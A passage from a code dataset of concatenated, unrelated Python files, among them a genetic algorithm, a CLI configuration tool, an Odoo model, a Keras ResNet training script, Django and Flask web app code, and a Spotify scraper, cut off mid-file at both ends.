cromosoma = np.random.randint(2, size = self._alelos)\n individuo = Individuo(self._alelos, self._tamano_gen, cromosoma)\n self._individuos = np.append(self._individuos, [individuo])\n\n def evaluaIndividuos(self):\n for i in self._individuos:\n i._fitness = self._problema.f(i._cromosoma)\n if i._fitness > self._mejor_historico._fitness:\n self._mejor_historico = copy.deepcopy(i)\n self._historicos.append([i._cromosoma,i._fitness, self._generacion])\n\n def ruleta(self):\n f_sum = np.sum([i._fitness for i in self._individuos])\n if f_sum == 0:\n return np.random.randint(len(self._individuos))\n else:\n r = np.random.randint(f_sum + 1)\n k = 0\n F = self._individuos[k]._fitness\n while F < r:\n k += 1\n F += self._individuos[k]._fitness\n return k\n\n def cruza(self, i1, i2):\n h1 = copy.deepcopy(i1)\n h2 = copy.deepcopy(i2)\n\n s = self._alelos - 1\n punto_cruza = np.random.randint(s) + 1\n for i in range(punto_cruza, self._alelos):\n h1._cromosoma[i], h2._cromosoma[i] = h2._cromosoma[i], h1._cromosoma[i]\n return h1, h2\n\n def mutacion(self, hijos):\n for h in hijos:\n for bit in range(len(h._cromosoma)):\n if np.random.rand() < self._p:\n h._cromosoma[bit] = int(not h._cromosoma[bit])\n","sub_path":"codigoFuente/Algorithms/AGB.py","file_name":"AGB.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"496068500","text":"\"\"\"\njut config command\n\n\"\"\"\n\nfrom jut import config\n\nfrom jut.api import auth, authorizations, deployments\nfrom jut.common import info\nfrom jut.exceptions import JutException\nfrom jut.util.console import prompt\n\n\ndef default_deployment(app_url, client_id, client_secret):\n \"\"\"\n \"\"\"\n if app_url.strip() == '':\n app_url = 'https://app.jut.io'\n\n token_manager = auth.TokenManager(client_id=client_id,\n client_secret=client_secret,\n app_url=app_url)\n\n user_deployments = deployments.get_deployments(token_manager=token_manager,\n app_url=app_url)\n\n if len(user_deployments) > 1:\n index = 0\n for deployment in user_deployments:\n info(' %d: %s', index + 1, deployment['name'])\n index += 1\n\n which = prompt('Pick default deployment from above: ')\n\n return user_deployments[int(which)-1]['name']\n else:\n return user_deployments[0]['name']\n\n\ndef default_configuration(interactive=True):\n if config.length() == 1:\n # when there is only one configuration, that should be the default one\n config.set_default(index=1)\n\n else:\n if interactive:\n info('Pick a default configuration from the list below')\n config.show()\n which = prompt('Set default configuration to: ')\n config.set_default(index=int(which))\n configuration = config.get_default()\n\n default_deployment(configuration['app_url'],\n configuration['client_id'],\n configuration['client_secret'])\n\n\ndef add_configuration(options):\n \"\"\"\n interactively add a new configuration\n\n \"\"\"\n if options.username != None:\n username = options.username\n else:\n username = prompt('Username: ')\n\n if options.password != None:\n password = options.password\n else:\n password = prompt('Password: ', hide_input=not options.show_password)\n\n if options.app_url != None:\n app_url = options.app_url\n else:\n app_url = prompt('App URL (default: https://app.jut.io just hit enter): ')\n\n if app_url.strip() == '':\n app_url = 'https://app.jut.io'\n\n section = '%s@%s' % (username, app_url)\n\n if config.exists(section):\n raise JutException('Configuration for \"%s\" already exists' % section)\n\n token_manager = auth.TokenManager(username=username,\n password=password,\n app_url=app_url)\n\n authorization = authorizations.get_authorization(token_manager,\n app_url=app_url)\n client_id = authorization['client_id']\n client_secret = authorization['client_secret']\n\n deployment_name = default_deployment(app_url,\n client_id,\n client_secret)\n\n config.add(section, **{\n 'app_url': app_url,\n 'deployment_name': deployment_name,\n 'username': username,\n 'client_id': client_id,\n 'client_secret': client_secret\n })\n\n if options.default:\n config.set_default(name=section)\n else:\n default_configuration(interactive=False)\n\n\ndef rm_configuration(options):\n was_default = False\n\n if options.username != None:\n configuration = '%s@%s' % (options.username, options.app_url)\n was_default = config.is_default(name=configuration)\n config.remove(name=configuration)\n\n else:\n config.show()\n which = prompt('Which configuration to remove: ')\n which = int(which)\n was_default = config.is_default(index=which)\n config.remove(index=which)\n\n if was_default:\n default_configuration()\n\n\ndef change_defaults(options):\n if options.username != None:\n configuration = '%s@%s' % (options.username, options.app_url)\n config.set_default(name=configuration)\n configuration = config.get_default()\n\n else:\n config.show()\n which = prompt('Set default configuration to: ')\n config.set_default(index=int(which))\n configuration = config.get_default()\n\n default_deployment(configuration['app_url'],\n configuration['client_id'],\n configuration['client_secret'])\n\n","sub_path":"jut/commands/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"514425191","text":"def is_safe(maze, x, y, r, c):\r\n if 0 < x <= r and 0 < y <= c and maze[x][y] == 0:\r\n return True\r\n return False\r\n\r\n\r\ndef solve(maze, x, y, r, c):\r\n global count\r\n if x == r and y == c:\r\n count += 1\r\n return\r\n if is_safe(maze, x + 1, y, r, c):\r\n solve(maze, x + 1, y, r, c)\r\n if is_safe(maze, x, y + 1, r, c):\r\n solve(maze, x, y + 1, r, c)\r\n\r\n\r\nr, c = input().split()\r\n\r\ncount = 0\r\n\r\nmaze = [[0 for i in range(int(c) + 1)] for j in range(int(r) + 1)]\r\n\r\nk = int(input())\r\nfor i in range(k):\r\n a, b = input().split()\r\n maze[int(a)][int(b)] = 1\r\n\r\n\r\nsolve(maze, 1, 1, int(r), int(c))\r\nprint(count)","sub_path":"2012 Contest/Problem S5.py","file_name":"Problem S5.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220411518","text":"from game.guesser import Guesser\nfrom game.word import Word\nfrom game.parachute import Parachute\n\n\nclass Director:\n \"\"\"A code template for a person who directs the game. The responsibility of \n this class of objects is to keep track of the score and control the \n sequence of play.\n \n Attributes:\n keep_playing (boolean): Whether or not the player wants to keep playing.\n parachute: Will take care of the graphics.\n guesser: User guesses the secret word by imputing a letter.\n words: Will take of getting a random word and respond to user inputs.\n \"\"\"\n\n def __init__(self):\n \"\"\"The class constructor.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n self.word = Word()\n self.parachute = Parachute()\n self.guesser = Guesser() \n self.keep_playing = True \n\n def start_game(self):\n \"\"\"Starts the game loop to control the sequence of play.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n self.do_outputs()\n \n while self.keep_playing:\n self.get_inputs()\n self.do_outputs()\n\n def do_outputs(self):\n print(self.word.secret_word())\n print(self.parachute.parachuter())\n \n self.keep_playing = not self.parachute.end() or self.word.see_blank()\n\n def get_inputs(self):\n user_guess = self.guesser.get_user_guess(\"Guess a letter [a-z]: \")\n \n while self.word.verify_letter(user_guess) == False:\n print(\"Please enter a different letter.\")\n user_guess = self.guesser.get_user_guess(\"Guess a letter [a-z]: \")\n \n if self.word.letter_in_list(user_guess) == False:\n self.parachute.guessed_wrong()","sub_path":"jumper/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"561864502","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nimport datetime\n\nclass PersonalDetails(models.Model):\n _inherit = 'res.partner'\n _description = \"force member's personal Details for ribbon_bk, medal, cap, belt, ranks etc\"\n is_force=fields.Boolean(\"Is a Force\",default=False , translate=True)\n force_id = fields.Many2one(\"ribbon_bk.force\",\"Force\")\n id_no=fields.Char(\"ID No\")\n rank = fields.Many2one(\"ribbon_bk.rank\",\"Rank\",translate=True)\n unit=fields.Many2one(\"ribbon_bk.force.unit\",string=\"Unit\",translate=True ,domain=\"[('force_name','=',force_id)]\")\n post=fields.Many2one(\"ribbon_bk.post\",string=\"Post\",translate=True)\n joining=fields.Date(\"Joining Date\")\n bcs=fields.Boolean(\"BCS ?\")\n retired=fields.Date(\"Retiered Date\")\n service_year=fields.Integer(\"Service Year\")\n service_month=fields.Integer(\"Service Month\")\n service_day=fields.Integer(\"Service Day\")\n service_length=fields.Char(\"Service Length\",compute=\"calculate_service_length\")\n cap=fields.Char(\"Cap\")\n belt=fields.Char(\"Belt\")\n name_tag_eng=fields.Char(\"Name Tag\")\n name_tag_bn=fields.Char(\"নাম ফলক\")\n note=fields.Char(\"note\")\n conf_note=fields.Char(\"confidential\")\n freedom_f=fields.Boolean(\"Freedom Fighter\")\n nirapotta=fields.Boolean(\"Nirapotta\")\n bpa=fields.Boolean(\"Police Academy\")\n psc=fields.Boolean(\"Staff College\")\n rab=fields.Boolean(\"RAB\")\n missions=fields.One2many(\"ribbon_bk.personal.mission\",'partner_id')\n services=fields.One2many(\"ribbon_bk.personal.service\",'partner_id')\n awards=fields.One2many(\"ribbon_bk.personal.award\",'partner_id')\n\n @api.onchange('joining',\"retired\")\n def calculate_service_length(self):\n currentDate=datetime.datetime.now()\n for rec in self:\n if rec.joining:\n if rec.retired:\n curYear=rec.retired.year\n curMonth=rec.retired.month\n curDay=rec.retired.day\n else:\n curYear = currentDate.year\n curMonth = currentDate.month\n curDay = currentDate.day\n\n lyear=rec.joining.year\n lmonth=rec.joining.month\n lday=rec.joining.day\n lday=curDay-lday\n lmonth=curMonth-lmonth\n lyear=curYear-lyear\n length_string=\"\"\n if lday<0:\n lday=lday+30\n lmonth=lmonth-1\n if lmonth<0:\n lmonth=lmonth+12\n lyear=lyear-1\n if lyear>0:\n length_string=length_string+ str(lyear) +\" Year \"\n if lmonth>0:\n length_string=length_string+ str(lmonth) + \" Month \"\n if lday>0:\n length_string=length_string+ str(lday) + \" Day \"\n rec.service_length=length_string\n rec.service_year=lyear\n rec.service_month=lmonth\n rec.service_day=lday\n\nclass RibbonMedalPersonalacquisition(models.Model):\n _name=\"ribbon_bk.personal.acquisition\"\n _description=\"list of Personal Acquisition\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalAward(models.Model):\n _name=\"ribbon_bk.personal.award\"\n _description=\"list of Personal Award\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalMission(models.Model):\n _name=\"ribbon_bk.personal.mission\"\n _description=\"list of Personal Mission\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")\nclass RibbonMedalPersonalservice(models.Model):\n _name=\"ribbon_bk.personal.service\"\n _description=\"list of Personal service\"\n partner_id = fields.Many2one(\"res.partner\")\n ribbon_id = fields.Many2one(\"ribbon_bk.regulation\")\n extension = fields.Many2one(\"ribbon_bk.extension\")\n serial = fields.Integer(\"serial\")","sub_path":"ribbon_bk/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"192265872","text":"import argparse\nimport os\nfrom datetime import datetime\nimport keras\nfrom keras.backend import set_session\nfrom keras.callbacks import LearningRateScheduler, TensorBoard, CSVLogger, ModelCheckpoint\nfrom keras.optimizers import SGD\nfrom keras.datasets import cifar10\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom resnet import ResnetBuilder\n\n\ndef str2bool(v):\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n if v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\ny_train = keras.utils.to_categorical(y_train, num_classes=10)\ny_test = keras.utils.to_categorical(y_test, num_classes=10)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-ly\", type=int, default=14)\nparser.add_argument(\"-wd\", type=float, default=1e-4)\nparser.add_argument(\"-bn\", type=str2bool, default=False)\nparser.add_argument(\"-ep\", type=int, default=100)\nparser.add_argument(\"-bs\", type=int, default=128)\nparser.add_argument(\"-shift\", type=float, default=0.125)\nparser.add_argument(\"-gpu\", type=str, default='1')\nparser.add_argument(\"-mem\", type=float, default=0.25)\nparams = parser.parse_args()\n\n# gpu setting\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = params.gpu\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = params.mem\nset_session(tf.Session(config=config))\n\n\nmodel = ResnetBuilder.build_resnet_cifar10(params.ly, use_bn=params.bn)\nsgd = SGD(momentum=0.9)\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\n\ndir_name = \"e\" + datetime.now().strftime(\"%m%d-%H-%M-%S\") + \\\n \"l\" + str(params.ly) + \\\n \"_ing\"\ncsv_logger = CSVLogger(os.path.join(dir_name, 'log.csv'))\nlr_scheduler = LearningRateScheduler(lambda x: 0.05 if x < 60 else 0.03 if x < 80 else 0.005)\nboard = TensorBoard(log_dir=dir_name, histogram_freq=0, write_graph=False, write_images=False)\nchecker = ModelCheckpoint(filepath=os.path.join(dir_name, \"weights.{epoch:02d}-{val_loss:.2f}.hdf5\"), period=20)\nif not os.path.exists(dir_name): os.mkdir(dir_name)\nwith open(os.path.join(dir_name, 'config'), 'w') as wf:\n wf.write(\"-----\" + str(params) + dir_name)\ncallbacks = [lr_scheduler, csv_logger, board, checker]\ndatagen_train = ImageDataGenerator(\n width_shift_range=params.shift,\n height_shift_range=params.shift,\n)\ndatagen_test = ImageDataGenerator()\nmodel.fit_generator(datagen_train.flow(x_train, y_train, batch_size=params.bs),\n steps_per_epoch=x_train.shape[0] / params.bs,\n validation_data=datagen_test.flow(x_test, y_test, batch_size=params.bs),\n validation_steps=x_test.shape[0] / params.bs,\n epochs=params.ep,\n max_q_size=2500,\n workers=10,\n callbacks=callbacks)\nlosses = model.evaluate(x_test, y_test, batch_size=params.batch_size)\nprint(losses)\nwith open(os.path.join(dir_name, 'config'), 'a') as wf:\n wf.write(str(losses) + '\\n')\nos.rename(dir_name, dir_name.replace('_ing', '_fin'))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465719404","text":"from datetime import date\n\nfrom django.test import TestCase\n\nfrom robber import expect\n\nfrom officers.indexers import RankChangeNewTimelineEventIndexer\nfrom data.factories import SalaryFactory, OfficerFactory, OfficerHistoryFactory\n\n\nclass RankChangeNewTimelineEventIndexerTestCase(TestCase):\n def extract_data(self):\n indexer = RankChangeNewTimelineEventIndexer()\n return [indexer.extract_datum(obj) for obj in indexer.get_queryset()]\n\n def test_extract_datum(self):\n officer1 = OfficerFactory(id=123)\n officer2 = OfficerFactory(id=456)\n OfficerHistoryFactory(\n officer=officer1,\n effective_date=date(2006, 1, 1),\n unit__unit_name='001',\n unit__description='District 1')\n OfficerHistoryFactory(\n officer=officer1,\n effective_date=date(2008, 1, 1),\n unit__unit_name='002',\n unit__description='District 2')\n OfficerHistoryFactory(\n officer=officer2,\n effective_date=date(2004, 1, 1),\n unit__unit_name='003',\n unit__description='District 3')\n SalaryFactory(\n officer=officer1, salary=5000, year=2005, rank='Police Officer', spp_date=date(2005, 1, 1),\n start_date=date(2005, 1, 1)\n )\n SalaryFactory(\n officer=officer1, salary=10000, year=2006, rank='Police Officer', spp_date=date(2005, 1, 1),\n start_date=date(2005, 1, 1)\n )\n SalaryFactory(\n officer=officer1, salary=15000, year=2007, rank='Sergeant', spp_date=date(2007, 1, 1),\n start_date=date(2005, 1, 1)\n )\n SalaryFactory(\n officer=officer2, salary=5000, year=2005, rank='Police Officer', spp_date=date(2005, 1, 1),\n start_date=date(2005, 1, 1)\n )\n SalaryFactory(\n officer=officer2, salary=15000, year=2006, rank='Detective', spp_date=date(2006, 1, 1),\n start_date=date(2005, 1, 1)\n )\n SalaryFactory(\n officer=officer2, salary=20000, year=2007, rank='Detective', spp_date=date(2006, 1, 1),\n start_date=date(2005, 1, 1)\n )\n\n rows = self.extract_data()\n expect(rows).to.have.length(4)\n expect(rows).to.eq([\n {\n 'officer_id': 123,\n 'date_sort': date(2005, 1, 1),\n 'priority_sort': 25,\n 'date': '2005-01-01',\n 'kind': 'RANK_CHANGE',\n 'unit_name': '',\n 'unit_description': '',\n 'rank': 'Police Officer',\n },\n {\n 'officer_id': 123,\n 'date_sort': date(2007, 1, 1),\n 'priority_sort': 25,\n 'date': '2007-01-01',\n 'kind': 'RANK_CHANGE',\n 'unit_name': '001',\n 'unit_description': 'District 1',\n 'rank': 'Sergeant',\n },\n {\n 'officer_id': 456,\n 'date_sort': date(2005, 1, 1),\n 'priority_sort': 25,\n 'date': '2005-01-01',\n 'kind': 'RANK_CHANGE',\n 'unit_name': '003',\n 'unit_description': 'District 3',\n 'rank': 'Police Officer',\n },\n {\n 'officer_id': 456,\n 'date_sort': date(2006, 1, 1),\n 'priority_sort': 25,\n 'date': '2006-01-01',\n 'kind': 'RANK_CHANGE',\n 'unit_name': '003',\n 'unit_description': 'District 3',\n 'rank': 'Detective',\n }\n ])\n","sub_path":"cpdb/officers/tests/indexers/test_rank_change_new_timeline_event_indexer.py","file_name":"test_rank_change_new_timeline_event_indexer.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172125704","text":"from os import listdir\nfrom os.path import isfile, join\nimport re\nimport string\n\nallmethod = (\n 'checkout',\n 'copy',\n 'delete',\n 'get',\n 'head',\n 'lock',\n 'merge',\n 'mkactivity',\n 'mkcol',\n 'move',\n 'm-search',\n 'notify',\n 'options',\n 'patch',\n 'post',\n 'purge',\n 'put',\n 'report',\n 'search',\n 'subscribe',\n 'trace',\n 'unlock',\n 'unsubscribe'\n)\n\npunctuations = string.punctuation.replace('_', '')\n\n\ndef getFunction(path):\n function_lists = []\n method_lists = []\n redux_names = []\n for filename in listdir(path):\n if filename == '.DS_Store':\n pass\n\n function_list = []\n method_list = []\n\n if re.search(r'\\bcontroller\\b', filename, re.I):\n remove_controller = filename.replace(re.search(r'\\bcontroller\\b', filename, re.I).group(), '')\n remove_js = remove_controller.replace('js', '')\n remove_dot = remove_js.replace('.', '')\n redux_names.append(remove_dot)\n\n with open(path + '/' + filename) as controls:\n lines = controls.readlines()\n routes = [l for l in lines if l[:6] == 'router']\n for r in routes:\n r = r.strip()\n for m in allmethod:\n if re.search(r\"\\b%s\\b\" % m, r, re.I):\n method_list.append(re.search(r\"\\b%s\\b\" % m, r, re.I).group())\n segments = r.split(',')\n function_name = segments[-1].translate(str.maketrans('', '', punctuations)).strip()\n function_list.append(function_name)\n function_lists.append(function_list)\n method_lists.append(method_list)\n function_list = []\n method_list = []\n return redux_names, function_lists, method_lists\n\n\nif __name__ == \"__main__\":\n print(getFunction('service'))\n","sub_path":"controller_reader.py","file_name":"controller_reader.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"549556033","text":"# @Time : 2020/6/21 18:57\n# @Author : Chenguangfu\n# @Site : \n# @File : urls.py\n# @Software: PyCharm\n\nfrom django.urls import path\nfrom . import views\n\napp_name = 'polls'\n\nurlpatterns = [\n # ex: /polls/\n path('', views.index, name='index'),\n\n # ex: /polls/5/\n # 加上specifics路由\n # path('specifics//', views.detail, name='detail'),\n # 注释,修改为带有具体指向的命名空间\n path('/', views.detail, name='detail'),\n\n # ex: /polls/5/results/\n path('/results/', views.results, name='results'),\n\n # ex: /polls/5/vote/\n path('/vote/', views.vote, name='vote'),\n\n]","sub_path":"mysite/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220596079","text":"#!/usr/bin/env python3\n\nimport logging, os\nimport logging.handlers\n\nfrom flask import (Flask, has_request_context, redirect, render_template,\n url_for, request)\n\nimport db, db_funcs, mail, polls, search\n\napp = Flask(__name__, instance_relative_config=True)\n\nclass DefaultConfig:\n SECRET_KEY=\"placeholder_key\"\n DATABASE=os.path.join(app.instance_path, \"stickpoll.sqlite\")\n TEMPLATES_AUTO_RELOAD=True\n ALLOW_REPEAT_VOTES=False\n SENDGRID_API_KEY=\"placeholder_key\"\n SENDGRID_DEFAULT_FROM=\"noreply@stickpoll.com\"\n UPDATE_INTERVAL=60\n\napp.config.from_object(DefaultConfig)\napp.config.from_pyfile(\"config.cfg\", silent=True)\n\ntry:\n os.makedirs(app.instance_path)\nexcept OSError:\n pass\n\nclass RequestFormatter(logging.Formatter):\n def format(self, record):\n if has_request_context():\n record.url = request.url\n record.remote_addr = request.remote_addr\n else:\n record.url = None\n record.remote_addr = None\n return super().format(record)\n\nif not app.config[\"DEBUG\"] or True:\n try:\n os.makedirs(os.path.join(app.instance_path, \"logs\"))\n except OSError:\n pass\n file_handler = logging.handlers.RotatingFileHandler(\n os.path.join(app.instance_path, \"logs\", \"stickpoll.log\"),\n maxBytes=10240,\n backupCount=10)\n file_handler.setFormatter(RequestFormatter(\n '[%(asctime)s] %(remote_addr)s requested %(url)s\\n'\n '%(levelname)s in %(module)s: %(message)s'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.setLevel(logging.INFO)\n app.logger.info(\"Startup\")\n\ndb.init_app(app)\n\napp.register_blueprint(polls.bp)\napp.register_blueprint(search.bp)\n\n@app.route(\"/\")\ndef home():\n # Fetch the most recent 20 polls open and closed polls\n open_polls = db_funcs.get_recent_polls(20, True)\n closed_polls = db_funcs.get_recent_polls(20, False)\n return render_template(\"index.html\", open_polls=open_polls,\n closed_polls=closed_polls)\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"404.html\"), 404\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n app.logger.error(\"Error 500\")\n return render_template(\"500.html\"), 500\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"633266450","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport os\nimport json\nimport pytest\nimport logging\nfrom akg import composite\nfrom akg.utils import custom_tiling\nfrom akg.utils import kernel_exec as utils\nfrom gen_json_data import gen_json_data\nfrom base import get_rtol_atol\nfrom tensorio import compare_tensor\nlogging.getLogger().setLevel(logging.INFO)\n\ndef print_usage():\n logging.info(\"Usage: test_composite_json.py to run single file.\")\n logging.info(\"Usage: test_composite_json.py -d to run files in a directory, default to be ./json_dir.\")\n logging.info(\"Usage: test_composite_json.py -ci to run ci files.\")\n logging.info(\"compile composite op\")\n\ndef get_result(desc, attrs=None):\n input_for_mod, expect, output_indexes = gen_json_data(desc)\n\n if attrs:\n mod = composite.build(desc, attrs)\n else:\n mod = composite.build(desc)\n output = utils.mod_launch(mod, input_for_mod, output_indexes)\n\n rtol, atol = get_rtol_atol(\"FUSED\", \"float32\")\n flag = True\n if len(output_indexes) > 1:\n if not all(map(lambda x, y: compare_tensor(x, y, rtol=rtol, atol=atol), output, expect)):\n flag = False\n else:\n if not compare_tensor(output, expect, rtol=rtol, atol=atol):\n flag = False\n return flag\n\n@pytest.mark.skip\ndef test_single_file(input_file, use_custom):\n with open(input_file, 'r') as f:\n desc = f.read()\n if use_custom:\n attrs = {}\n attrs[\"dim\"] = custom_tiling.set_dims(((4, 1), (4, 1)))\n flag = get_result(desc, attrs)\n else:\n flag = get_result(desc)\n if flag:\n logging.info(\"Run Pass!\")\n else:\n logging.info(\"Precision Error\")\n\n@pytest.mark.skip\ndef test_json_dir():\n json_dir = \"./json_dir/\"\n json_dims_file = \"./json_dir/dims.json\"\n files = os.listdir(json_dir)\n flag = True\n with open(json_dims_file, 'r') as f:\n base = f.read()\n dims_dict = json.loads(base)\n for input_file in files:\n with open(json_dir + input_file, 'r') as f:\n if input_file == \"dims.json\":\n continue\n desc = f.read()\n if input_file in dims_dict:\n dim_info = dims_dict[input_file]\n attrs = {'dim': dim_info}\n flag = get_result(desc, attrs)\n else:\n flag = get_result(desc)\n if not flag:\n logging.info(\"----------Error Json name is----------\")\n logging.info(input_file)\n raise ValueError(\"Precision Error\")\n logging.info(\"All Json files run PASS!\")\n\ndef get_op_cycles_info(desc, cycle_info_file, old_op_cycles=100000000):\n with open(cycle_info_file, 'r') as f:\n op_cycles = int(f.read())\n diff = old_op_cycles - op_cycles\n return op_cycles, diff\n\n@pytest.mark.level0\ndef test_ci(profile=False):\n ci_path = \"./need_adapt/\"\n if profile:\n need_update = False\n base_json_file = \"./need_adapt/base.json\"\n cycle_info_file = \"./cycle_path/a.txt\"\n os.environ['PROFILING'] = \"true\"\n os.environ['CYCLES_PATH'] = os.getcwd() + '/' + cycle_info_file\n with open(base_json_file, 'r') as f:\n base = f.read()\n old_dict = json.loads(base)\n files = os.listdir(ci_path)\n for fi in files:\n with open(ci_path + fi, 'r') as f:\n if fi == \"base.json\":\n continue\n desc = f.read()\n flag = get_result(desc)\n if not flag:\n logging.info(\"----------Error Json info is----------\")\n logging.info(desc)\n raise ValueError(\"Precision Error\")\n elif not profile:\n logging.info(\"Composite Json {} pass!\".format(fi))\n else:\n old_op_cycles = old_dict[fi]\n op_cycles, diff = get_op_cycles_info(desc, cycle_info_file, old_op_cycles)\n logging.info(\"~~~~~~~~~~~cycle diff is~~~~~~~~~~~\")\n logging.info(diff)\n if diff > 500:\n need_update = True\n logging.info(\"Find Better Cycle the Json Info is:\")\n logging.info(desc)\n logging.info(\"The Better Cycle is:\")\n logging.info(op_cycles)\n old_dict[fi] = op_cycles\n elif diff < -1000:\n logging.info(\"----------Error Json info is----------\")\n logging.info(desc)\n raise ValueError(\"Performance Degradation\")\n assert(flag)\n logging.info(\"All ops are ok!\")\n if profile:\n if need_update:\n logging.info(\"Need to Update Baseline!!!\")\n with open(base_json_file, 'w', encoding='utf-8') as f:\n json.dump(old_dict, f, indent=4)\n else:\n logging.info(\"No significant performance improvement. Do not need to update Baseline!\")\n\ndef main(argv):\n if len(argv) in [1, 2] and (argv[0].endswith(\".info\") or argv[0].endswith(\".json\")):\n use_custom = len(argv) == 2 and argv[1] == 'c'\n test_single_file(argv[0], use_custom)\n elif len(argv) == 1 and argv[0] == \"-d\":\n test_json_dir()\n elif len(argv) == 1 and argv[0] == \"-ci\":\n test_ci(profile=False)\n elif len(argv) == 1 and argv[0] == \"-cip\":\n test_ci(profile=True)\n else:\n print_usage()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"tests/operators/composite/test_composite_json.py","file_name":"test_composite_json.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231828158","text":"import math\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\nfrom query_music import QueryMusic\nimport curl_spotify \n\nclass ScrapePopularity(object):\n\tdef __init__(self):\n\t\tself.query = QueryMusic()\n\n\tdef get_song_uris(self):\n\t\tsongs = self.query.query(\"\"\"\n\t\t\tselect id, uri from spotify_song \n\t\t\tleft join spotify_song_popularity\n\t\t\t\ton spotify_song_popularity.song = spotify_song.id\n\t\t\twhere spotify_song_popularity.timestamp is null or spotify_song_popularity.timestamp < (now() - interval '90 days')\n\t\t\torder by spotify_song_popularity.timestamp asc nulls first\n\t\t\tlimit 100\"\"\")\n\n\t\treturn [{\"id\": x[0], \"uri\": x[1]} for x in songs]\n\n\tdef get_song_popularity(self, songs):\n\t\tfor song in songs:\n\t\t\ttrack = curl_spotify.get_tracks([song[\"uri\"]])['tracks'][0]\n\t\t\tself.query.query(\"update spotify_song_popularity set popularity = %s, timestamp = now() where song = %s returning 1\", (track['popularity'], song['id']))\n\t\t\tself.query.query(\"insert into spotify_song_popularity (song, popularity, timestamp) select %s, %s, now() where not exists (select 1 from spotify_song_popularity where song = %s) returning 1\", (song['id'], track['popularity'], song['id']))\n\n\t\treturn True\n\t\t\t\ndef main():\n\tscraper = ScrapePopularity()\n\tsongs = scraper.get_song_uris()\n\tscraper.get_song_popularity(songs)\n\nif __name__ == '__main__': \n main()\n\n","sub_path":"lib/scrape_popularity.py","file_name":"scrape_popularity.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417302591","text":"# -*- coding: utf-8 -*-\n\n# 2019/3/20 0020 上午 10:59 \n\n__author__ = 'RollingBear'\n\nimport os\nimport time\nimport logging\nimport traceback\n\n\nclass system_service():\n\n def __init__(self):\n pass\n\n def get_service_state(self, service_name):\n\n '''\n get service state with a cmd command\n :param service_name: service's name\n :return: service state(str)\n '''\n\n try:\n result = os.popen('sc query ' + service_name).read()\n\n if 'RUNNING' in result or \"START_PENDING\" in result:\n return 'active'\n elif 'STOPPED' in result or 'STOP_PENDING' in result:\n return 'inactive'\n elif '1060' in 